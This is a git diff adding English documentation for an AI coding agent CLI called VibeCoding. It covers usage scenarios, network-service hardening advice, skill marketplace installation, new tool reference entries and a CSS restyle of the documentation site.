+  🔧 bash("go build ./...")
+  → Build passed
+
+✅ Fixed: added error check at line 52
+```
+
+### C: Adding a New Feature
+
+```
+> add a /health endpoint to the HTTP handler
+
+[Agent]
+  📄 plan(title="Add /health endpoint", steps=[
+    {title: "Read existing handler structure", status: "running"},
+    {title: "Add health handler", status: "pending"},
+    {title: "Register route", status: "pending"},
+    {title: "Add tests", status: "pending"},
+    {title: "Verify build", status: "pending"}
+  ])
+
+  📄 read("internal/server/routes.go")
+  📝 edit(...)  # Add handler
+  📝 edit(...)  # Register route
+  🔧 bash("go test ./internal/server/ -run TestHealth")
+  🔧 bash("go build ./...")
+
+  📄 plan(..., steps=[..., {title: "Verify build", status: "done"}])
+
+✅ Done: /health endpoint added and tested
+```
+
+### Mode Selection Guide
+
+| Task | Recommended Mode | Command |
+|------|-----------------|---------|
+| Read code, learn project | `plan` | `vibecoding --mode plan` |
+| Write code, fix bugs | `agent` (default) | `vibecoding` |
+| Install deps, system ops | `yolo` | `vibecoding --mode yolo` |
+
+---
+
+## Scenario 2: Non-Interactive Mode (CI/Script Integration)
+
+Use VibeCoding in CI pipelines or scripts.
+
+### A: Code Review
+
+```bash
+# Review PR in CI
+git diff main..feature | vibecoding -P "review this diff, point out potential issues"
+```
+
+### B: Automated Refactoring
+
+```bash
+# Batch refactoring
+vibecoding -P "change all fmt.Errorf calls to use %w for error wrapping" --mode yolo
+```
+
+### C: Generate Documentation
+
+```bash
+# Generate README for a package
+vibecoding -P "generate README.md for internal/cache package with usage examples" --mode yolo
+```
+
+---
+
+## Scenario 3: Multi-Agent Mode (Complex Task Delegation)
+
+Enable sub-agent tools with `--multi-agent` to split and execute complex tasks in parallel.
+
+### Launch
+
+```bash
+$ vibecoding --multi-agent
+```
+
+### Scenario: Parallel Refactoring and Testing
+
+```
+> I need: 1) rename internal/cache to internal/store
+>        2) ensure all tests pass at the same time
+
+[Agent]
+  🤖 subagent_spawn(task="Rename internal/cache to internal/store, update all import paths",
+                     mode="agent",
+                     tools=["read", "write", "edit", "bash", "grep", "find"])
+
+  → Handle: "agent-1"
+
+  🤖 subagent_spawn(task="Run full test suite, report failures",
+                     mode="agent",
+                     tools=["read", "bash", "grep", "find"])
+
+  → Handle: "agent-2"
+
+  ... wait for sub-agents ...
+
+  🤖 subagent_status(handle="agent-1")
+  → Status: completed
+  → Result: "Renamed cache to store, updated 15 files' import paths"
+
+  🤖 subagent_status(handle="agent-2")
+  → Status: completed
+  → Result: "3 tests failed: TestCacheGet, TestCacheSet, TestCacheDelete"
+
+  🤖 subagent_send(handle="agent-1", message="Fix the 3 failing tests reported by agent-2")
+
+  ... sub-agent continues ...
+
+✅ Done: package renamed, all tests pass
+```
+
+### Sub-Agent Tools Summary
+
+| Tool | Purpose |
+|------|---------|
+| `subagent_spawn` | Start sub-agent, returns handle |
+| `subagent_status` | Query sub-agent status and results |
+| `subagent_send` | Send follow-up instructions |
+| `subagent_destroy` | Stop and clean up sub-agent |
+
+### Multi-Agent + Cron Scheduling
+
+```bash
+# Daily code review
+vibecoding hermes cron add "daily-review" \
+  "review the last 24 hours of git changes, output an issue report" \
+  --schedule "@daily"
+```
+
+---
+
+## Scenario 4: VS Code ACP Integration
+
+Use VibeCoding directly in VS Code as an AI coding assistant.
+
+### Step 1: Install
+
+```bash
+npm install -g vibecoding-installer
+```
+
+### Step 2: Configure VS Code
+
+Edit VS Code's `settings.json`:
+
+```json
+{
+  "acp.agents": {
+    "vibecoding": {
+      "command": "vibecoding",
+      "args": ["acp", "--mode", "agent", "--multi-agent"],
+      "description": "VibeCoding AI Assistant"
+    }
+  }
+}
+```
+
+### Step 3: Use
+
+1. Open your project in VS Code
+2. Open the ACP panel (via extension)
+3. Ask questions or request code changes directly
+
+**Experience in VS Code:**
+
+```
+You: change ParseConfig in utils.go to support YAML format
+
+VibeCoding:
+  [tool_call: read utils.go]
+  [tool_call: edit utils.go]
+  [tool_call: bash "go test ./..."]
+  ✅ YAML support added, all tests pass
+```
+
+### ACP Mode Special Capabilities
+
+| Capability | Description |
+|------------|-------------|
+| Session Management | IDE auto-manages session create/load/continue |
+| Permission Requests | IDE popup for high-risk operations |
+| MCP Integration | IDE can pass MCP server configs |
+| Multi-Agent | Enable sub-agent tools via `--multi-agent` |
+
+---
+
+## Scenario 5: A2A Standalone Server Mode
+
+Run VibeCoding as an A2A server for other agents to call.
+
+### A: Start Standalone A2A Server
+
+```bash
+# Initialize config
+vibecoding a2a --init-a2a-config
+
+# Edit a2a.json (optional)
+vim ~/.vibecoding/a2a.json
+
+# Start server
+vibecoding a2a start --port 8093 --work-dir ~/projects/myapp
+```
+
+### B: Other Agents Call It
+
+```bash
+# Using vibecoding client
+vibecoding a2a send "list all Go files in the project" --target http://localhost:8093
+
+# Using curl
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "run all tests"}]
+      }
+    },
+    "id": 1
+  }'
+
+# Discover remote agent capabilities
+vibecoding a2a discover http://localhost:8093
+```
+
+### C: A2A Server with Authentication
+
+```bash
+# Start with auth token
+vibecoding a2a start --auth-token "my-secret-token-xxx"
+
+# Client call with token
+vibecoding a2a send "review main.go" \
+  --target http://remote-server:8093 \
+  --auth-token "my-secret-token-xxx"
+```
+
+---
+
+## Scenario 6: A2A Master Mode (Cross-Machine Agent Dispatch)
+
+Manage multiple remote A2A agents, letting the LLM automatically dispatch tasks.
+
+### Architecture
+
+```
+┌─────────────────────────────────────────────────────────┐
+│  Local (VibeCoding + A2A Master)                         │
+│                                                         │
+│  vibecoding --enable-a2a-master                         │
+│  ┌─────────────────────────────────────────────────┐   │
+│  │  LLM auto-decides → a2a_dispatch tool            │   │
+│  └─────────────────────────────────────────────────┘   │
+│           │                   │                         │
+│           ▼                   ▼                         │
+│  ┌──────────────┐   ┌──────────────┐                   │
+│  │ code-reviewer│   │  ci-agent    │                   │
+│  │ 192.168.1.10 │   │ 192.168.1.20 │                   │
+│  │ :8093        │   │ :8093        │                   │
+│  └──────────────┘   └──────────────┘                   │
+└─────────────────────────────────────────────────────────┘
+```
+
+### Step 1: Start A2A Servers on Remote Machines
+
+**Machine A (Code Review Agent):**
+```bash
+# 192.168.1.10
+vibecoding a2a start --port 8093 --work-dir ~/projects/shared
+```
+
+**Machine B (CI Agent):**
+```bash
+# 192.168.1.20
+vibecoding a2a start --port 8093 --work-dir ~/ci-runner --auth-token "ci-secret"
+```
+
+### Step 2: Initialize Master Config Locally
+
+```bash
+# Generate sample config
+vibecoding --init-a2a-master-config
+
+# Edit a2a-list.json
+vim ~/.vibecoding/a2a-list.json
+```
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://192.168.1.10:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://192.168.1.20:8093",
+      "auth_token": "ci-secret"
+    }
+  ]
+}
+```
+
+### Step 3: Enable Master Mode
+
+```bash
+$ vibecoding --enable-a2a-master --verbose
+```
+
+```
+A2A master mode enabled: 2 agents loaded from /home/user/.vibecoding/a2a-list.json
+
+> review internal/handler.go for code quality, then run tests to make sure nothing breaks
+
+[Agent]
+  I'll dispatch tasks to both remote agents:
+
+  🔧 a2a_dispatch(agent_name="code-reviewer",
+                   message="Review internal/handler.go for code quality, focus on
+                           error handling, performance, and security")
+
+  → code-reviewer returns: "Found 3 issues: 1) Line 45 doesn't handle timeout..."
+
+  🔧 a2a_dispatch(agent_name="ci-agent",
+                   message="Run the full test suite, report results")
+
+  → ci-agent returns: "47/47 tests passed, coverage 82%"
+
+✅ Summary:
+- Code review found 3 issues (details listed)
+- All tests pass, coverage 82%
+- Recommend fixing timeout handling on line 45 first
+```
+
+---
+
+## Scenario 7: Gateway Mode (HTTP API)
+
+Run VibeCoding as an OpenAI-compatible HTTP service for other applications to call.
+
+### Initialize and Start
+
+```bash
+# Generate config template
+vibecoding --init-gateway
+
+# Edit gateway.json (set token, port, etc.)
+vim ~/.vibecoding/gateway.json
+
+# Start gateway
+vibecoding gateway --port 8080 --work-dir ~/projects/myapp
+```
+
+### Call It
+
+```bash
+# curl (OpenAI-compatible format)
+curl http://localhost:8080/v1/chat/completions \
+  -H "Authorization: Bearer your-token" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [
+      {"role": "user", "content": "explain this project architecture"}
+    ]
+  }'
+
+# Python OpenAI SDK
+from openai import OpenAI
+client = OpenAI(base_url="http://localhost:8080/v1", api_key="your-token")
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "write an HTTP middleware"}]
+)
+```
+
+---
+
+## Scenario 8: Hermes Messaging Gateway
+
+Connect VibeCoding to WeChat/Feishu for unattended AI coding assistant.
+
+### Start
+
+```bash
+# Configure hermes.json
+vim ~/.vibecoding/hermes.json
+
+# Start
+vibecoding hermes start
+```
+
+### Typical Config
+
+```json
+{
+  "server": { "port": 8090, "auth_token": "my-token" },
+  "platforms": {
+    "wechat": { "enabled": true },
+    "feishu": { "enabled": true, "app_id": "...", "app_secret": "..." }
+  },
+  "default_mode": "yolo",
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": ["/srv/projects"]
+  },
+  "a2a": { "enabled": true },
+  "cron": { "enabled": true },
+  "memory": { "enabled": true }
+}
+```
+
+### Usage in Messaging Platform
+
+```
+User: /new
+Bot:  New session created
+
+User: add rate limiting middleware to the api package
+Bot:  [executing...]
+      ✅ Added rate limiting middleware with configurable requests/sec
+      Modified: internal/api/middleware.go, internal/api/routes.go
+
+User: run tests
+Bot:  [running go test ./...]
+      ✅ All passed (12/12)
+```
+
+---
+
+## Scenario 9: Combined Modes (Multi-Tool Workflow)
+
+Combine multiple modes for a complete development workflow.
+
+### Example: Develop + Review + Deploy
+
+```bash
+# 1. Local development (TUI mode)
+cd ~/projects/myapp
+vibecoding --mode yolo
+
+# 2. Pre-commit review (Plan mode)
+vibecoding --mode plan "review all changes in git diff"
+
+# 3. Post-push CI review (Gateway mode)
+# In CI script:
+curl http://gateway:8080/v1/chat/completions \
+  -d '{"messages": [{"role": "user", "content": "review PR #42"}]}'
+
+# 4. Scheduled security scan (Hermes + Cron)
+vibecoding hermes cron add "security-scan" \
+  "scan for security vulnerabilities and sensitive data leaks" \
+  --schedule "@weekly"
+```
+
+---
+
+## Quick Reference
+
+| Scenario | Command |
+|----------|---------|
+| Daily coding | `vibecoding` |
+| Read-only analysis | `vibecoding --mode plan` |
+| Full access | `vibecoding --mode yolo` |
+| Non-interactive | `vibecoding -P "..."` |
+| Multi-agent | `vibecoding --multi-agent` |
+| A2A server | `vibecoding a2a start` |
+| A2A master | `vibecoding --enable-a2a-master` |
+| HTTP gateway | `vibecoding gateway` |
+| Messaging gateway | `vibecoding hermes start` |
+| IDE integration | `vibecoding acp` |
+| Continue session | `vibecoding -c` |
+| Resume session | `vibecoding -r <id>` |
+| Init gateway config | `vibecoding --init-gateway` |
+| Init A2A config | `vibecoding a2a --init-a2a-config` |
+| Init master config | `vibecoding --init-a2a-master-config` |
diff --git a/docs/en/security.md b/docs/en/security.md
index 273b0d5..9420fea 100644
--- a/docs/en/security.md
+++ b/docs/en/security.md
@@ -123,6 +123,25 @@ vibecoding -M yolo
 - May execute dangerous commands
 - May expose sensitive information
 
+## Network Service Hardening
+
+Gateway, Hermes, and A2A can expose HTTP/WebSocket entry points. Treat these services as remote code-execution surfaces whenever tools can run in `agent` or `yolo` mode.
+
+- **Gateway**: enable `auth.enabled` before exposing beyond loopback; startup warns when Gateway listens beyond loopback in `yolo` mode without authentication.
+- **A2A**: standalone A2A binds to `127.0.0.1` by default. Use `--host 0.0.0.0` only for intentional exposure, and configure an auth token.
+- **Hermes WebSocket**: send tokens with `Authorization: Bearer <token>` during the WebSocket handshake. Query-string tokens are accepted only for compatibility.
+- **Working directories**: use `allowedWorkDirs` / `allowed_work_dirs` to restrict per-request or per-platform working directories.
+
+## Trusted Config Shell Commands
+
+Provider API keys can be loaded from shell commands with `apiKey: "!command"`, but this is disabled by default. Enable it only for trusted local config:
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
+Prefer environment-variable references such as `${DEEPSEEK_API_KEY}` for shared configs.
+
 ## Enabling Sandbox
 
 ### Command Line
@@ -543,4 +562,4 @@ Error: Read-only file system
 - [bubblewrap GitHub](https://github.com/containers/bubblewrap)
 - [Linux Namespaces](https://man7.org/linux/man-pages/man7/namespaces.7.html)
 - [seccomp](https://man7.org/linux/man-pages/man2/seccomp.2.html)
-- [Security Best Practices](https://owasp.org/www-project-developer-guide/)
\ No newline at end of file
+- [Security Best Practices](https://owasp.org/www-project-developer-guide/)
diff --git a/docs/en/skillhub.md b/docs/en/skillhub.md
new file mode 100644
index 0000000..875fb9e
--- /dev/null
+++ b/docs/en/skillhub.md
@@ -0,0 +1,221 @@
+# Online Skill Marketplace Integration
+
+VibeCoding is compatible with existing skill marketplaces (SkillHub / ClawHub). Skill packages published on these platforms can be used directly in VibeCoding.
+
+| Platform | URL | Region |
+|----------|-----|--------|
+| **SkillHub** | [https://skillhub.cn](https://skillhub.cn/) | China |
+| **ClawHub** | [https://clawhub.ai](https://clawhub.ai/) | International |
+
+> **Note:** VibeCoding does not have a built-in skill marketplace, but uses the standard
+> skill directory format (`SKILL.md`) that is fully compatible with SkillHub / ClawHub
+> packages. Skills downloaded from these platforms work out of the box — just drop them
+> into your skills directory.
+
+This guide covers:
+
+1. [Installing Skills from Marketplaces](#installing-skills-from-marketplaces) — three steps
+2. [Skill Format Compatibility](#skill-format-compatibility) — standard format details
+3. [Local Skill System](#local-skill-system) — built-in features
+4. [Cron Foundation](#cron-foundation) — scheduled task infrastructure
+
+---
+
+## Installing Skills from Marketplaces
+
+Installing skills from SkillHub / ClawHub takes three steps:
+
+### 1. Download the Skill Package
+
+Download the skill package from the marketplace (typically a directory or archive containing `SKILL.md`).
+
+### 2. Extract to Skills Directory
+
+```bash
+# Global install (available to all projects)
+# Linux/macOS:
+unzip go-expert.zip -d ~/.vibecoding/skills/
+# Windows:
+Expand-Archive go-expert.zip -DestinationPath "$env:APPDATA\vibecoding\skills\"
+
+# Project-level install (current project only)
+unzip go-expert.zip -d .skills/
+```
+
+### 3. Verify Installation
+
+```
+> /skills
+Loaded 3 skills:
+  - go-expert (global)        ← just installed
+  - coding-standards (global)
+  - project-conventions (project)
+```
+
+That's it. The skill is automatically loaded and injected into the system prompt.
+
+---
+
+## Skill Format Compatibility
+
+VibeCoding's skill format is fully compatible with the SkillHub / ClawHub standard:
+
+```
+skill-name/
+├── SKILL.md              # Required: skill definition
+└── references/           # Optional: on-demand reference files
+    ├── api-guide.md
+    └── examples.md
+```
+
+### SKILL.md Standard Format
+
+```markdown
+# Skill Name
+
+Short description.
+
+## Rules
+
+- Rule 1
+- Rule 2
+
+## Examples
+
+...
+```
+
+### Reference Files
+
+Skills can include reference files under a `references/` directory, loaded on demand via the `skill_ref` tool:
+
+```
+> skill_ref(skill="go-expert", ref="references/api-guide.md")
+→ Returns the content of api-guide.md
+```
+
+This allows skills to include extensive reference material without consuming system prompt space.
+
+---
+
+## Local Skill System
+
+In addition to marketplace downloads, you can create local skills directly.
+
+### Skill Directories
+
+| Type | Location | Scope |
+|------|----------|-------|
+| Global | `~/.vibecoding/skills/` (Linux/macOS) or `%APPDATA%\vibecoding\skills\` (Windows) | All projects |
+| Project | `.skills/` (project root) | Current project, overrides global |
+
+### Creating a Skill
+
+```bash
+mkdir -p ~/.vibecoding/skills/go-expert
+cat > ~/.vibecoding/skills/go-expert/SKILL.md << 'EOF'
+# Go Expert
+
+Expert-level Go coding standards.
+
+## Rules
+
+- Use `gofmt` for formatting
+- Follow Effective Go guidelines
+- Return errors; do not panic
+- Use `fmt.Errorf` with `%w` for wrapping
+
+## Testing
+
+- Write table-driven tests
+- Use `t.Run` for subtests
+- Aim for >80% coverage
+EOF
+```
+
+### Using Skills
+
+```
+> /skills
+Loaded 2 skills:
+  - go-expert (global)
+  - project-conventions (project)
+
+> /skill:go-expert
+Loaded skill: go-expert
+```
+
+### Configuration
+
+Configure the global skills directory in `settings.json`:
+
+```json
+{
+  "skillsDir": "~/.vibecoding/skills"
+}
+```
+
+Project skills load automatically from `.skills/` without extra configuration.
+
+---
+
+## Cron Foundation
+
+VibeCoding has an internal cron infrastructure (`internal/cron` package) and TUI command entry points. The cron store persists jobs to `~/.vibecoding/cron.json` and the scheduler checks for due jobs on a 30-second interval.
+
+### `/cron` TUI Commands
+
+Requires multi-agent mode (`--multi-agent` or Ctrl+P to toggle):
+
+```
+> /cron add <description>      — Add a scheduled task
+> /cron list                   — List scheduled tasks
+> /cron enable <id>            — Enable a task
+> /cron disable <id>           — Disable a task
+> /cron remove <id>            — Remove a task
+> /cron run <id>               — Run a task now
+```
+
+### Cron Job Data Model
+
+| Field | Description |
+|-------|-------------|
+| `id` | Unique job ID (e.g. `cron-1716883200`) |
+| `name` | Short task description |
+| `prompt` | Task prompt for sub-agent |
+| `schedule` | 5-field cron expression |
+| `mode` | `agent` or `yolo` |
+| `enabled` | Whether the job is active |
+| `last_run` | Timestamp of last execution |
+| `next_run` | Computed next execution time |
+| `run_count` | Total executions |
+| `last_status` | `success`, `failed`, or `running` |
+
+### Scheduler Architecture
+
+```
+Scheduler loop (every 30s)
+    │
+    ├── List all enabled jobs from store
+    │
+    ├── Check each job: is it due?
+    │   ├── Never run before → due
+    │   ├── NextRun has passed → due
+    │   └── Last run > 1 hour ago → due (fallback)
+    │
+    └── Due jobs → spawn sub-agent
+              │
+              ├── Mark job as "running"
+              ├── Create agent via AgentManager
+              ├── Run agent with job prompt
+              ├── Collect result
+              └── Update job status (success/failed)
+```
+
+---
+
+## Related Documents
+
+- [Skills System](skills.md) — Local skills format and management
+- [Configuration](configuration.md) — Full settings reference
+- [Security](security.md) — Sandbox and approval controls
diff --git a/docs/en/tools.md b/docs/en/tools.md
index 34757b5..9df05a7 100644
--- a/docs/en/tools.md
+++ b/docs/en/tools.md
@@ -14,10 +14,17 @@ VibeCoding provides a set of built-in tools for file operations, code search, an
 | `find` | Filename search | Read-only |
 | `ls` | List directory contents | Read-only |
 | `plan` | Publish task plan/status | Read-only |
+| `jobs` | List and manage background jobs | Read-only |
+| `kill` | Stop a running background job | Only standard/yolo |
+| `question` | Ask user multiple-choice questions | Plan mode (TUI only) |
+| `memory` | Read/write persistent memory | Hermes mode |
+| `cron` | Manage scheduled background tasks | Hermes/multi-agent mode |
 | `subagent_spawn` | Start a delegated sub-agent task | Multi-agent mode only |
 | `subagent_status` | Query a sub-agent's status/result | Multi-agent mode only |
 | `subagent_send` | Send follow-up instructions to a sub-agent | Multi-agent mode only |
 | `subagent_destroy` | Stop and remove a sub-agent | Multi-agent mode only |
+| `a2a_dispatch` | Send task to remote A2A agent | A2A Master mode only |
+| `skill_ref` | Load skill reference file | When skills available |
 
 ## Tool Details
 
@@ -133,6 +140,56 @@ Destroys a sub-agent and releases its resources:
 
 ---
 
+### a2a_dispatch - A2A Remote Agent Dispatch
+
+Send tasks to remote A2A agents registered in `a2a-list.json`. Only registered when launched with `--enable-a2a-master`.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `agent_name` | string | ✓ | Target agent name (auto-enumerated from config) |
+| `message` | string | ✓ | Task message |
+
+**Example:**
+
+```json
+{
+  "agent_name": "code-reviewer",
+  "message": "Review internal/handler.go for code quality"
+}
+```
+
+**Returns:** Text response from the remote agent
+
+See [A2A Protocol - A2A Master Mode](a2a.md#a2a-master-mode) for details.
+
+---
+
+### skill_ref - Skill Reference Loading
+
+Load reference files from skill directories. Only registered when skills are available.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `skill` | string | ✓ | Skill name (directory name) |
+| `ref` | string | ✓ | Reference file path (relative to skill directory) |
+
+**Example:**
+
+```json
+{
+  "skill": "my-conventions",
+  "ref": "references/api-style.md"
+}
+```
+
+**Returns:** Reference file content
+
+---
+
 ### write - File Writing
 
 Create new files or overwrite existing files.
@@ -309,6 +366,139 @@ List directory contents.
 
 ---
 
+### jobs - Background Job Management
+
+List and check status of background jobs started with `bash async=true`.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `jobId` | int | - | Get detailed status of a specific job by ID |
+| `cleanup` | bool | - | Remove finished jobs from the list |
+
+**Example:**
+
+```json
+{}
+```
+
+**Returns:** List of background jobs with status (running/finished), or detailed info for a specific job including PID, elapsed time, stdout, and stderr.
+
+---
+
+### kill - Stop Background Job
+
+Stop a running background job started with `bash async=true`.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `jobId` | int | ✓ | The job ID to kill |
+
+**Example:**
+
+```json
+{ "jobId": 3 }
+```
+
+**Returns:** Confirmation message with job ID and PID.
+
+---
+
+### question - User Clarification (Plan Mode)
+
+Ask the user a multiple-choice question during plan mode to clarify requirements.
+Only registered in TUI + plan mode. Uses `QuestionHandler` optional interface (type assertion); not exposed in Gateway/Hermes/ACP.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `question` | string | ✓ | The question text |
+| `options` | array | ✓ | List of option strings |
+
+**Example:**
+
+```json
+{
+  "question": "Which database should we use?",
+  "options": ["PostgreSQL", "SQLite", "MongoDB"]
+}
+```
+
+**Returns:** User's selected option or custom answer.
+
+---
+
+### memory - Persistent Memory (Hermes)
+
+Read and write persistent memory stored in `memory.md`. Memory persists across sessions. Only available in Hermes mode.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `action` | string | ✓ | Action: `read`, `add`, `update`, `delete` |
+| `section` | string | - | Section name (e.g., `User Profile`, `Working Memory`, `Lessons Learned`). Required for add/update/delete; optional for read. |
+| `content` | string | - | Content for add/delete actions |
+| `old` | string | - | Old text for update action |
+| `new` | string | - | New replacement text for update action |
+
+**Example:**
+
+```json
+{
+  "action": "add",
+  "section": "User Profile",
+  "content": "Prefers Go over Python for backend work."
+}
+```
+
+**Returns:** Action confirmation or section content.
+
+---
+
+### cron - Scheduled Tasks (Hermes / Multi-Agent)
+
+Manage scheduled background tasks that run via sub-agents. Available in Hermes mode and CLI multi-agent mode.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `action` | string | ✓ | Action: `list`, `create`, `enable`, `disable`, `remove`, `run` |
+| `id` | string | - | Job ID (required for enable/disable/remove/run) |
+| `name` | string | - | Short task name (required for create) |
+| `prompt` | string | - | Task prompt for the sub-agent (required for create) |
+| `schedule` | string | - | Schedule: `@daily`, `@weekly`, `@monthly`, `@hourly`, `@every 30m`, `@every 2h`, or empty for one-shot |
+| `oneshot` | bool | - | If true, run once then auto-disable |
+| `mode` | string | - | Agent mode: `agent` or `yolo` (default: `yolo`) |
+
+**Example:**
+
+```json
+{
+  "action": "create",
+  "name": "daily-check",
+  "prompt": "Check for outdated dependencies and report.",
+  "schedule": "@daily"
+}
+```
+
+**Returns:** Job list, creation confirmation, or action result.
+
+---
+
+### MCP Dynamic Tools
+
+Tools, resources, and prompts from MCP (Model Context Protocol) servers are auto-discovered and registered per session. Tool names and parameters are defined by the MCP server, not VibeCoding. MCP tools appear in the tool list alongside built-in tools.
+
+See [Skills](skills.md) and [Configuration](configuration.md) for MCP server setup.
+
+---
+
 ## Tool Usage Patterns
 
 ### Read-Modify-Write Pattern
diff --git a/docs/index.html b/docs/index.html
index 57f490b..b0b670e 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -4,31 +4,96 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>VibeCoding Documentation</title>
-    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&family=Roboto+Mono:wght@400;500&display=swap" rel="stylesheet">
-    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
+    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+    <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outlined" rel="stylesheet">
     <script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script>
     <style>
         :root {
-            --md-primary: #1976D2;
-            --md-primary-dark: #1565C0;
-            --md-primary-light: #BBDEFB;
-            --md-accent: #FF4081;
-            --md-surface: #FFFFFF;
-            --md-background: #FAFAFA;
-            --md-on-primary: #FFFFFF;
-            --md-on-surface: #212121;
-            --md-on-surface-medium: #757575;
-            --md-on-surface-disabled: #BDBDBD;
-            --md-divider: #E0E0E0;
-            --md-error: #D32F2F;
-            --md-success: #388E3C;
-            --md-shadow-1: 0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24);
-            --md-shadow-2: 0 3px 6px rgba(0,0,0,0.16), 0 3px 6px rgba(0,0,0,0.23);
-            --md-shadow-3: 0 10px 20px rgba(0,0,0,0.19), 0 6px 6px rgba(0,0,0,0.23);
-            --md-shadow-4: 0 14px 28px rgba(0,0,0,0.25), 0 10px 10px rgba(0,0,0,0.22);
-            --md-radius: 4px;
+            /* Colors - Modern Indigo palette */
+            --primary: #6366f1;
+            --primary-hover: #4f46e5;
+            --primary-light: #e0e7ff;
+            --primary-dark: #3730a3;
+            --accent: #f43f5e;
+            --accent-light: #ffe4e6;
+            
+            /* Surfaces */
+            --surface: #ffffff;
+            --surface-hover: #f8fafc;
+            --surface-active: #f1f5f9;
+            --background: #f8fafc;
+            --background-alt: #f1f5f9;
+            
+            /* Text */
+            --text-primary: #0f172a;
+            --text-secondary: #475569;
+            --text-muted: #94a3b8;
+            --text-disabled: #cbd5e1;
+            --text-inverse: #ffffff;
+            
+            /* Borders */
+            --border: #e2e8f0;
+            --border-light: #f1f5f9;
+            --border-focus: var(--primary);
+            
+            /* Status */
+            --success: #10b981;
+            --success-light: #d1fae5;
+            --error: #ef4444;
+            --error-light: #fee2e2;
+            --warning: #f59e0b;
+            --warning-light: #fef3c7;
+            --info: #3b82f6;
+            --info-light: #dbeafe;
+            
+            /* Shadows */
+            --shadow-xs: 0 1px 2px rgba(0,0,0,0.05);
+            --shadow-sm: 0 1px 3px rgba(0,0,0,0.1), 0 1px 2px rgba(0,0,0,0.06);
+            --shadow-md: 0 4px 6px -1px rgba(0,0,0,0.1), 0 2px 4px -1px rgba(0,0,0,0.06);
+            --shadow-lg: 0 10px 15px -3px rgba(0,0,0,0.1), 0 4px 6px -2px rgba(0,0,0,0.05);
+            --shadow-xl: 0 20px 25px -5px rgba(0,0,0,0.1), 0 10px 10px -5px rgba(0,0,0,0.04);
+            
+            /* Spacing */
+            --radius-sm: 6px;
+            --radius-md: 8px;
+            --radius-lg: 12px;
+            --radius-xl: 16px;
+            
+            /* Layout */
             --sidebar-width: 280px;
             --header-height: 64px;
+            --content-max-width: 900px;
+            
+            /* Transitions */
+            --transition-fast: 150ms cubic-bezier(0.4, 0, 0.2, 1);
+            --transition-normal: 200ms cubic-bezier(0.4, 0, 0.2, 1);
+            --transition-slow: 300ms cubic-bezier(0.4, 0, 0.2, 1);
+        }
+
+        /* Dark mode */
+        @media (prefers-color-scheme: dark) {
+            :root {
+                --surface: #1e293b;
+                --surface-hover: #334155;
+                --surface-active: #475569;
+                --background: #0f172a;
+                --background-alt: #1e293b;
+                
+                --text-primary: #f1f5f9;
+                --text-secondary: #94a3b8;
+                --text-muted: #64748b;
+                --text-disabled: #475569;
+                
+                --border: #334155;
+                --border-light: #1e293b;
+                
+                --primary-light: #312e81;
+                --accent-light: #881337;
+                --success-light: #064e3b;
+                --error-light: #7f1d1d;
+                --warning-light: #78350f;
+                --info-light: #1e3a5f;
+            }
         }
 
         * {
@@ -38,10 +103,10 @@
         }
 
         body {
-            font-family: 'Roboto', -apple-system, BlinkMacSystemFont, sans-serif;
+            font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
             line-height: 1.6;
-            color: var(--md-on-surface);
-            background-color: var(--md-background);
+            color: var(--text-primary);
+            background-color: var(--background);
             -webkit-font-smoothing: antialiased;
             -moz-osx-font-smoothing: grayscale;
         }
@@ -53,35 +118,42 @@
             left: 0;
             right: 0;
             height: var(--header-height);
-            background-color: var(--md-primary);
-            color: var(--md-on-primary);
+            background-color: var(--surface);
+            border-bottom: 1px solid var(--border);
             display: flex;
             align-items: center;
             padding: 0 24px;
-            box-shadow: var(--md-shadow-2);
             z-index: 1000;
+            backdrop-filter: blur(12px);
+            background-color: rgba(255, 255, 255, 0.9);
+        }
+
+        @media (prefers-color-scheme: dark) {
+            .app-bar {
+                background-color: rgba(30, 41, 59, 0.9);
+            }
         }
 
         .app-bar__menu {
             display: none;
             background: none;
             border: none;
-            color: var(--md-on-primary);
+            color: var(--text-primary);
             cursor: pointer;
             padding: 8px;
             margin-right: 16px;
-            border-radius: 50%;
-            transition: background-color 0.2s;
+            border-radius: var(--radius-md);
+            transition: background-color var(--transition-fast);
         }
 
         .app-bar__menu:hover {
-            background-color: rgba(255,255,255,0.1);
+            background-color: var(--surface-hover);
         }
 
         .app-bar__title {
-            font-size: 20px;
-            font-weight: 500;
-            letter-spacing: 0.02em;
+            font-size: 18px;
+            font-weight: 600;
+            color: var(--text-primary);
             flex: 1;
             display: flex;
             align-items: center;
@@ -89,8 +161,8 @@
         }
 
         .app-bar__logo {
-            width: 32px;
-            height: 32px;
+            width: 28px;
+            height: 28px;
         }
 
         .app-bar__actions {
